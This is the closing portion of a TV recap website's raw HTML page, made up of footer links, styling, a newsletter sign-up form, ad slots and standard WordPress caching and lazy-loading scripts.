rel="follow"><span class="td-blm-menu-item-txt">About TV Acutte</span></a></li>
<li id="menu-item-55197" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55197"><a href="https://www.tvacute.com/terms-of-use/" data-wpel-link="internal" target="_self" rel="follow"><span class="td-blm-menu-item-txt">Terms Of Use</span></a></li>
<li id="menu-item-4078" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-4078"><a href="https://www.tvacute.com/privacy-policy/" data-wpel-link="internal" target="_self" rel="follow"><span class="td-blm-menu-item-txt">Privacy Policy</span></a></li>
<li id="menu-item-55199" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55199"><a href="https://www.tvacute.com/disclaimer/" data-wpel-link="internal" target="_self" rel="follow"><span class="td-blm-menu-item-txt">Disclaimer</span></a></li>
<li id="menu-item-55198" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55198"><a href="https://www.tvacute.com/dmca/" data-wpel-link="internal" target="_self" rel="follow"><span class="td-blm-menu-item-txt">DMCA</span></a></li>
<li id="menu-item-55202" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55202"><a href="https://www.tvacute.com/contact-us/" data-wpel-link="internal" target="_self" rel="follow"><span class="td-blm-menu-item-txt">Contact us</span></a></li>
<li id="menu-item-55201" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55201"><a href="https://www.tvacute.com/write-for-us/" data-wpel-link="internal" target="_self" rel="follow"><span class="td-blm-menu-item-txt">Write For Us</span></a></li>
</ul></div></div></div></div></div><div class="vc_column tdi_50  wpb_column vc_column_container tdc-column td-pb-span4">
<style scoped="">.tdi_50{vertical-align:baseline}.tdi_50>.wpb_wrapper,.tdi_50>.wpb_wrapper>.tdc-elements{display:block}.tdi_50>.wpb_wrapper>.tdc-elements{width:100%}.tdi_50>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_50>.wpb_wrapper{width:auto;height:auto}.tdi_50{padding-right:0px!important}</style><div class="wpb_wrapper"><div class="tdm_block td_block_wrap tdn_block_newsletter_subscribe tdi_51 tds_newsletter1_block tdn-content-horiz-left td-pb-border-top td_block_template_1  td-fix-index" data-td-block-uid="tdi_51">
<style>.tdi_51{margin-bottom:0px!important}</style>
<style>.tdi_52 input[type=email],.tdi_52 button{font-family:Rubik!important;font-size:13px!important}.tdi_52 .tdn-title{color:var(--today-news-white);font-family:Rubik!important;font-size:15px!important;line-height:1.2!important;font-weight:700!important;text-transform:uppercase!important;letter-spacing:-0.5px!important}.tdi_52 .tdn-descr{color:var(--today-news-light-gray);font-family:Rubik!important;font-size:13px!important;line-height:1.3!important}.tdi_52 .tdn-email-bar{flex-direction:row}.tdi_52 .tdn-input-wrap{margin-bottom:0}.tdi_52 input[type=email]{border-right-width:0}.tdi_52 input{color:var(--today-news-white);background-color:var(--today-news-white-transparent2);border-width:0px 0 0px 0px}.tdi_52 input::placeholder{color:var(--today-news-light-gray)}.tdi_52 input:-ms-input-placeholder{color:var(--today-news-light-gray)!important}.tdi_52 button{background-color:#fb4c7d;font-family:Rubik!important;font-size:13px!important;font-weight:700!important;text-transform:uppercase!important;letter-spacing:-0.3px!important}.tdi_52 button:hover{background-color:#f93b71}.tdi_52 button .tdn-btn-icon{top:-1px}@media (min-width:1019px) and (max-width:1140px){.tdi_52 input[type=email],.tdi_52 button{font-size:12px!important}.tdi_52 .tdn-title{font-size:14px!important}.tdi_52 .tdn-descr{font-size:12px!important}.tdi_52 button{font-size:12px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_52 input[type=email],.tdi_52 button{font-size:11px!important}.tdi_52 .tdn-title{font-size:13px!important}.tdi_52 .tdn-descr{font-size:11px!important}.tdi_52 button{font-size:11px!important}}@media (max-width:767px){.tdi_52 input[type=email],.tdi_52 button{font-size:12px!important}.tdi_52 .tdn-descr{font-size:12px!important}.tdi_52 button{font-size:12px!important}}</style><div class="tds-newsletter tds-newsletter1 tdi_52 td-fix-index"><div class="tdn-info-wrap"><div class="tdn-info"><h3 class="tdn-title">Subscribe</h3><p class="tdn-descr">To get email updates from Today News.</p></div><form class="tdn-form" action="list-manage.com/subscribe" method="post" name="mc-embedded-subscribe-form" target="_blank"><div class="tdn-email-bar"><div class="tdn-input-wrap"><input type="email" name="EMAIL" aria-label="email" placeholder="Your Email ID" required=""></div><div class="tdn-btn-wrap"><button class="tdn-submit-btn" type="submit" name="subscribe">Subscribe</button></div></div></form></div></div></div></div></div></div></div><div id="tdi_53" class="tdc-row"><div class="vc_row tdi_54  wpb_row td-pb-row tdc-element-style">
<style scoped="">.tdi_54,.tdi_54 .tdc-columns{min-height:0}.tdi_54,.tdi_54 .tdc-columns{display:flex;flex-direction:row;flex-wrap:nowrap;justify-content:flex-start;align-items:stretch}.tdi_54 .tdc-columns{width:100%}@media (min-width:768px){.tdi_54{margin-left:-15px;margin-right:-15px}.tdi_54 .tdc-row-video-background-error,.tdi_54>.vc_column,.tdi_54>.tdc-columns>.vc_column{padding-left:15px;padding-right:15px}}@media (min-width:1019px) and (max-width:1140px){@media (min-width:768px){.tdi_54{margin-left:-10px;margin-right:-10px}.tdi_54 .tdc-row-video-background-error,.tdi_54>.vc_column,.tdi_54>.tdc-columns>.vc_column{padding-left:10px;padding-right:10px}}}@media (min-width:768px) and (max-width:1018px){@media (min-width:768px){.tdi_54{margin-left:-10px;margin-right:-10px}.tdi_54 .tdc-row-video-background-error,.tdi_54>.vc_column,.tdi_54>.tdc-columns>.vc_column{padding-left:10px;padding-right:10px}}}@media (max-width:767px){.tdi_54,.tdi_54 .tdc-columns{flex-direction:column}}.tdi_54{padding-bottom:45px!important;border-color:var(--today-news-white-transparent2)!important;border-style:solid!important;border-width:0px 0px 2px 0px!important;position:relative}.tdi_54 .td_block_wrap{text-align:left}@media (min-width:768px) and (max-width:1018px){.tdi_54{padding-bottom:25px!important}}@media (min-width:1019px) and (max-width:1140px){.tdi_54{padding-bottom:35px!important}}@media (max-width:767px){.tdi_54{padding-bottom:25px!important}}</style>
<div class="tdi_53_rand_style td-element-style"><style>.tdi_53_rand_style{background-color:#111111!important}</style></div><div class="vc_column tdi_56  wpb_column vc_column_container tdc-column td-pb-span12">
<style scoped="">.tdi_56{vertical-align:baseline}.tdi_56>.wpb_wrapper,.tdi_56>.wpb_wrapper>.tdc-elements{display:block}.tdi_56>.wpb_wrapper>.tdc-elements{width:100%}.tdi_56>.wpb_wrapper>.vc_row_inner{width:auto}.tdi_56>.wpb_wrapper{width:auto;height:auto}</style><div class="wpb_wrapper"><div class="tdm_block td_block_wrap tdm_block_inline_text tdi_57 td-pb-border-top td_block_template_1" data-td-block-uid="tdi_57">
<style>@media (max-width:767px){.tdi_57{margin-bottom:6px!important}}</style>
<style>.tdi_57{text-align:center!important;margin-right:auto;margin-left:auto}.tdi_57 .tdm-descr{color:var(--today-news-light-gray);font-family:Rubik!important;font-size:14px!important;line-height:1.3!important}@media (min-width:1019px) and (max-width:1140px){.tdi_57 .tdm-descr{font-size:11px!important}}@media (min-width:768px) and (max-width:1018px){.tdi_57 .tdm-descr{font-size:10px!important;line-height:1.25!important}}@media (max-width:767px){.tdi_57 .tdm-descr{font-size:11px!important}}</style><p class="tdm-descr">Copyright © 2024 | TV Acutte</p></div></div></div></div></div></div></div> </div>
</div>
</div>
<div class="code-block code-block-8" style="margin: 8px 0; clear: both;">
<div id="HB_Footer_Close_hbagency_space_10854">
<div id="HB_CLOSE_hbagency_space_10854"></div>
<div id="HB_OUTER_hbagency_space_10854">
<div id="hbagency_space_10854"></div>
</div></div>
<div id="HB_Footer_Close_hbagency_space_10856">
<div id="HB_CLOSE_hbagency_space_10856"></div>
<div id="HB_OUTER_hbagency_space_10856">
<div id="hbagency_space_10856"></div>
</div></div>
<div id="HB_Footer_Close_hbagency_space_27572">
<div id="HB_CLOSE_hbagency_space_27572"></div>
<div id="HB_OUTER_hbagency_space_27572">
<div id="hbagency_space_27572"></div>
</div></div>
<div id="hbagency_space_27573_video">
<div id="hbagency_space_27573"></div>
</div></div>


<style type="text/css" media="screen">.td-container,.tdc-row,.tdc-row-composer{width:1200px}</style>
<div id="amp-mobile-version-switcher" hidden="">
<a rel="follow" href="https://www.tvacute.com/from-season-3-episode-2-recap/?amp=1" data-wpel-link="internal" target="_self">
Go to mobile version </a>
</div>
<script type="rocketlazyloadscript" data-rocket-type="text/javascript" id="rocket-browser-checker-js-after">
/* <![CDATA[ */
"use strict";var _createClass=function(){function defineProperties(target,props){for(var i=0;i<props.length;i++){var descriptor=props[i];descriptor.enumerable=descriptor.enumerable||!1,descriptor.configurable=!0,"value"in descriptor&&(descriptor.writable=!0),Object.defineProperty(target,descriptor.key,descriptor)}}return function(Constructor,protoProps,staticProps){return protoProps&&defineProperties(Constructor.prototype,protoProps),staticProps&&defineProperties(Constructor,staticProps),Constructor}}();function _classCallCheck(instance,Constructor){if(!(instance instanceof Constructor))throw new TypeError("Cannot call a class as a function")}var RocketBrowserCompatibilityChecker=function(){function RocketBrowserCompatibilityChecker(options){_classCallCheck(this,RocketBrowserCompatibilityChecker),this.passiveSupported=!1,this._checkPassiveOption(this),this.options=!!this.passiveSupported&&options}return _createClass(RocketBrowserCompatibilityChecker,[{key:"_checkPassiveOption",value:function(self){try{var options={get passive(){return!(self.passiveSupported=!0)}};window.addEventListener("test",null,options),window.removeEventListener("test",null,options)}catch(err){self.passiveSupported=!1}}},{key:"initRequestIdleCallback",value:function(){!1 in window&&(window.requestIdleCallback=function(cb){var start=Date.now();return setTimeout(function(){cb({didTimeout:!1,timeRemaining:function(){return Math.max(0,50-(Date.now()-start))}})},1)}),!1 in window&&(window.cancelIdleCallback=function(id){return clearTimeout(id)})}},{key:"isDataSaverModeOn",value:function(){return"connection"in navigator&&!0===navigator.connection.saveData}},{key:"supportsLinkPrefetch",value:function(){var elem=document.createElement("link");return elem.relList&&elem.relList.supports&&elem.relList.supports("prefetch")&&window.IntersectionObserver&&"isIntersecting"in IntersectionObserverEntry.prototype}},{key:"isSlowConnection",value:function(){return"connection"in navigator&&"effectiveType"in navigator.connection&&("2g"===navigator.connection.effectiveType||"slow-2g"===navigator.connection.effectiveType)}}]),RocketBrowserCompatibilityChecker}();
/* ]]> */
</script>
<script type="text/javascript" id="rocket-preload-links-js-extra">
/* <![CDATA[ */
var RocketPreloadLinksConfig = {"excludeUris":"\/(?:.+\/)?feed(?:\/(?:.+\/?)?)?$|\/(?:.+\/)?embed\/|\/(index.php\/)?(.*)wp-json(\/.*|$)|\/refer\/|\/go\/|\/recommend\/|\/recommends\/","usesTrailingSlash":"1","imageExt":"jpg|jpeg|gif|png|tiff|bmp|webp|avif|pdf|doc|docx|xls|xlsx|php","fileExt":"jpg|jpeg|gif|png|tiff|bmp|webp|avif|pdf|doc|docx|xls|xlsx|php|html|htm","siteUrl":"https:\/\/www.tvacute.com","onHoverDelay":"100","rateThrottle":"3"};
/* ]]> */
</script>
<script type="rocketlazyloadscript" data-rocket-type="text/javascript" id="rocket-preload-links-js-after">
/* <![CDATA[ */
(function() {
"use strict";var r="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e},e=function(){function i(e,t){for(var n=0;n<t.length;n++){var i=t[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(e,i.key,i)}}return function(e,t,n){return t&&i(e.prototype,t),n&&i(e,n),e}}();function i(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}var t=function(){function n(e,t){i(this,n),this.browser=e,this.config=t,this.options=this.browser.options,this.prefetched=new Set,this.eventTime=null,this.threshold=1111,this.numOnHover=0}return e(n,[{key:"init",value:function(){!this.browser.supportsLinkPrefetch()||this.browser.isDataSaverModeOn()||this.browser.isSlowConnection()||(this.regex={excludeUris:RegExp(this.config.excludeUris,"i"),images:RegExp(".("+this.config.imageExt+")$","i"),fileExt:RegExp(".("+this.config.fileExt+")$","i")},this._initListeners(this))}},{key:"_initListeners",value:function(e){-1<this.config.onHoverDelay&&document.addEventListener("mouseover",e.listener.bind(e),e.listenerOptions),document.addEventListener("mousedown",e.listener.bind(e),e.listenerOptions),document.addEventListener("touchstart",e.listener.bind(e),e.listenerOptions)}},{key:"listener",value:function(e){var t=e.target.closest("a"),n=this._prepareUrl(t);if(null!==n)switch(e.type){case"mousedown":case"touchstart":this._addPrefetchLink(n);break;case"mouseover":this._earlyPrefetch(t,n,"mouseout")}}},{key:"_earlyPrefetch",value:function(t,e,n){var i=this,r=setTimeout(function(){if(r=null,0===i.numOnHover)setTimeout(function(){return i.numOnHover=0},1e3);else if(i.numOnHover>i.config.rateThrottle)return;i.numOnHover++,i._addPrefetchLink(e)},this.config.onHoverDelay);t.addEventListener(n,function e(){t.removeEventListener(n,e,{passive:!0}),null!==r&&(clearTimeout(r),r=null)},{passive:!0})}},{key:"_addPrefetchLink",value:function(i){return this.prefetched.add(i.href),new Promise(function(e,t){var n=document.createElement("link");n.rel="prefetch",n.href=i.href,n.onload=e,n.onerror=t,document.head.appendChild(n)}).catch(function(){})}},{key:"_prepareUrl",value:function(e){if(null===e||"object"!==(void 0===e?"undefined":r(e))||!1 in e||-1===["http:","https:"].indexOf(e.protocol))return null;var t=e.href.substring(0,this.config.siteUrl.length),n=this._getPathname(e.href,t),i={original:e.href,protocol:e.protocol,origin:t,pathname:n,href:t+n};return this._isLinkOk(i)?i:null}},{key:"_getPathname",value:function(e,t){var n=t?e.substring(this.config.siteUrl.length):e;return n.startsWith("/")||(n="/"+n),this._shouldAddTrailingSlash(n)?n+"/":n}},{key:"_shouldAddTrailingSlash",value:function(e){return this.config.usesTrailingSlash&&!e.endsWith("/")&&!this.regex.fileExt.test(e)}},{key:"_isLinkOk",value:function(e){return null!==e&&"object"===(void 0===e?"undefined":r(e))&&(!this.prefetched.has(e.href)&&e.origin===this.config.siteUrl&&-1===e.href.indexOf("?")&&-1===e.href.indexOf("#")&&!this.regex.excludeUris.test(e.href)&&!this.regex.images.test(e.href))}}],[{key:"run",value:function(){"undefined"!=typeof RocketPreloadLinksConfig&&new n(new RocketBrowserCompatibilityChecker({capture:!0,passive:!0}),RocketPreloadLinksConfig).init()}}]),n}();t.run();
}());
/* ]]> */
</script>
<script type="text/javascript" src="https://www.tvacute.com/wp-includes/js/underscore.min.js?ver=1.13.4" id="underscore-js" defer=""></script>
<script type="text/javascript" src="https://www.tvacute.com/wp-content/plugins/td-cloud-library/assets/js/js_posts_autoload.min.js?ver=6cc04771d778c6f460cf525df52258a3" id="tdb_js_posts_autoload-js" defer=""></script>
<script type="text/javascript" src="https://www.tvacute.com/wp-content/plugins/td-composer/legacy/Newspaper/js/tagdiv_theme.min.js?ver=12.6.3" id="td-site-min-js" defer=""></script>
<script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://www.tvacute.com/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdPostImages.js?ver=1726249638" id="tdPostImages-js" defer=""></script>
<script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://www.tvacute.com/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdSocialSharing.js?ver=1726249638" id="tdSocialSharing-js" defer=""></script>
<script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://www.tvacute.com/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdModalPostImages.js?ver=1726249638" id="tdModalPostImages-js" defer=""></script>
<script type="rocketlazyloadscript" data-rocket-type="text/javascript" data-rocket-src="https://www.tvacute.com/wp-includes/js/comment-reply.min.js?ver=6.6.2" id="comment-reply-js" async="async" data-wp-strategy="async"></script>
<script type="rocketlazyloadscript" data-rocket-type="text/javascript" data-rocket-src="https://www.tvacute.com/wp-content/plugins/google-site-kit/dist/assets/js/googlesitekit-consent-mode-3d6495dceaebc28bcca3.js" id="googlesitekit-consent-mode-js" defer=""></script>
<script type="text/javascript" src="https://www.tvacute.com/wp-content/plugins/td-cloud-library/assets/js/js_files_for_front.min.js?ver=6cc04771d778c6f460cf525df52258a3" id="tdb_js_files_for_front-js" defer=""></script>
<script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://www.tvacute.com/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdLoadingBox.js?ver=1726249638" id="tdLoadingBox-js" defer=""></script>
<script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://www.tvacute.com/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdAjaxSearch.js?ver=1726249637" id="tdAjaxSearch-js" defer=""></script>
<script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://www.tvacute.com/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdLogin.js?ver=1726249638" id="tdLogin-js" defer=""></script>
<script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://www.tvacute.com/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdMenu.js?ver=1726249638" id="tdMenu-js" defer=""></script>
<script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://www.tvacute.com/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdInfiniteLoader.js?ver=1726249638" id="tdInfiniteLoader-js" defer=""></script>
<script type="rocketlazyloadscript" data-minify="1" data-rocket-type="text/javascript" data-rocket-src="https://www.tvacute.com/wp-content/cache/min/1/wp-content/plugins/td-composer/legacy/Newspaper/js/tdSmartSidebar.js?ver=1726249638" id="tdSmartSidebar-js" defer=""></script>

<script type="rocketlazyloadscript">window.addEventListener('DOMContentLoaded', function() {
    

            
                jQuery(window).on( 'load', function () {
                    var block = jQuery('.tdi_18'),
                        blockClass = '.tdi_18',
                        blockInner = block.find('.tdb-block-inner'),
                        blockOffsetLeft;

                    if( block.find('audio').length > 0 ) {
                        jQuery(blockClass + ' audio').mediaelementplayer();
                    }

                    if( block.hasClass('tdb-sfi-stretch') ) {
                        jQuery(window).resize(function () {
                            blockOffsetLeft = block.offset().left;

                            if( block.hasClass('tdb-sfi-stretch-left') ) {
                                blockInner.css('margin-left', -blockOffsetLeft + 'px');
                            } else {
                                blockInner.css('margin-right', -(jQuery(window).width() - (blockOffsetLeft + block.outerWidth())) + 'px');
                            }
                        });
                        jQuery(window).resize();
                    }

                    setTimeout(function () {
                        block.css('opacity', 1);
                    }, 500);
                });
            
            
});</script>
<script type="rocketlazyloadscript">var td_res_context_registered_atts=["style_general_breadcrumbs","style_general_single_categories","style_general_single_title","style_general_title_single","style_bg_space","style_general_post_meta","style_general_single_author","style_general_single_date","style_general_single_post_share","style_general_featured_image","style_general_single_content","style_general_single_tags","style_general_separator","style_general_author_box","style_general_header_logo","style_general_header_align","style_general_inline_text","style_general_list_menu","style_specific_list_menu_vertical","style_specific_list_menu_accordion","style_specific_list_menu_horizontal"];</script>
<script>window.lazyLoadOptions=[{elements_selector:"img[data-lazy-src],.rocket-lazyload,iframe[data-lazy-src]",data_src:"lazy-src",data_srcset:"lazy-srcset",data_sizes:"lazy-sizes",class_loading:"lazyloading",class_loaded:"lazyloaded",threshold:300,callback_loaded:function(element){if(element.tagName==="IFRAME"&&element.dataset.rocketLazyload=="fitvidscompatible"){if(element.classList.contains("lazyloaded")){if(typeof window.jQuery!="undefined"){if(jQuery.fn.fitVids){jQuery(element).parent().fitVids()}}}}}},{elements_selector:".rocket-lazyload",data_src:"lazy-src",data_srcset:"lazy-srcset",data_sizes:"lazy-sizes",class_loading:"lazyloading",class_loaded:"lazyloaded",threshold:300,}];window.addEventListener('LazyLoad::Initialized',function(e){var lazyLoadInstance=e.detail.instance;if(window.MutationObserver){var observer=new MutationObserver(function(mutations){var image_count=0;var iframe_count=0;var rocketlazy_count=0;mutations.forEach(function(mutation){for(var i=0;i<mutation.addedNodes.length;i++){if(typeof mutation.addedNodes[i].getElementsByTagName!=='function'){continue}
if(typeof mutation.addedNodes[i].getElementsByClassName!=='function'){continue}
images=mutation.addedNodes[i].getElementsByTagName('img');is_image=mutation.addedNodes[i].tagName=="IMG";iframes=mutation.addedNodes[i].getElementsByTagName('iframe');is_iframe=mutation.addedNodes[i].tagName=="IFRAME";rocket_lazy=mutation.addedNodes[i].getElementsByClassName('rocket-lazyload');image_count+=images.length;iframe_count+=iframes.length;rocketlazy_count+=rocket_lazy.length;if(is_image){image_count+=1}
if(is_iframe){iframe_count+=1}}});if(image_count>0||iframe_count>0||rocketlazy_count>0){lazyLoadInstance.update()}});var b=document.getElementsByTagName("body")[0];var config={childList:!0,subtree:!0};observer.observe(b,config)}},!1)</script><script data-no-minify="1" async="" src="https://www.tvacute.com/wp-content/plugins/wp-rocket/assets/js/lazyload/17.8.3/lazyload.min.js"></script><script>function lazyLoadThumb(e,alt,l){var t='<img data-lazy-src="https://i.ytimg.com/vi/ID/hqdefault.jpg" alt="" width="480" height="360"><noscript><img src="https://i.ytimg.com/vi/ID/hqdefault.jpg" alt="" width="480" height="360"></noscript>',a='<button class="play" aria-label="play Youtube video"></button>';if(l){t=t.replace('data-lazy-','');t=t.replace('loading="lazy"','');t=t.replace(/<noscript>.*?<\/noscript>/g,'');}t=t.replace('alt=""','alt="'+alt+'"');return t.replace("ID",e)+a}function lazyLoadYoutubeIframe(){var e=document.createElement("iframe"),t="ID?autoplay=1";t+=0===this.parentNode.dataset.query.length?"":"&"+this.parentNode.dataset.query;e.setAttribute("src",t.replace("ID",this.parentNode.dataset.src)),e.setAttribute("frameborder","0"),e.setAttribute("allowfullscreen","1"),e.setAttribute("allow","accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture"),this.parentNode.parentNode.replaceChild(e,this.parentNode)}document.addEventListener("DOMContentLoaded",function(){var exclusions=[];var e,t,p,u,l,a=document.getElementsByClassName("rll-youtube-player");for(t=0;t<a.length;t++)(e=document.createElement("div")),(u='https://i.ytimg.com/vi/ID/hqdefault.jpg'),(u=u.replace('ID',a[t].dataset.id)),(l=exclusions.some(exclusion=>u.includes(exclusion))),e.setAttribute("data-id",a[t].dataset.id),e.setAttribute("data-query",a[t].dataset.query),e.setAttribute("data-src",a[t].dataset.src),(e.innerHTML=lazyLoadThumb(a[t].dataset.id,a[t].dataset.alt,l)),a[t].appendChild(e),(p=e.querySelector(".play")),(p.onclick=lazyLoadYoutubeIframe)});</script>
<script>var rocket_lcp_data = {"ajax_url":"https:\/\/www.tvacute.com\/wp-admin\/admin-ajax.php","nonce":"bc76834773","url":"https:\/\/www.tvacute.com\/from-season-3-episode-2-recap","is_mobile":false,"elements":"img, video, picture, p, main, div, li, svg","width_threshold":1600,"height_threshold":700,"debug":null}</script><script data-name="wpr-lcp-beacon" src="https://www.tvacute.com/wp-content/plugins/wp-rocket/assets/js/lcp-beacon.min.js" async="" beacon-completed="true"></script>

</body></html>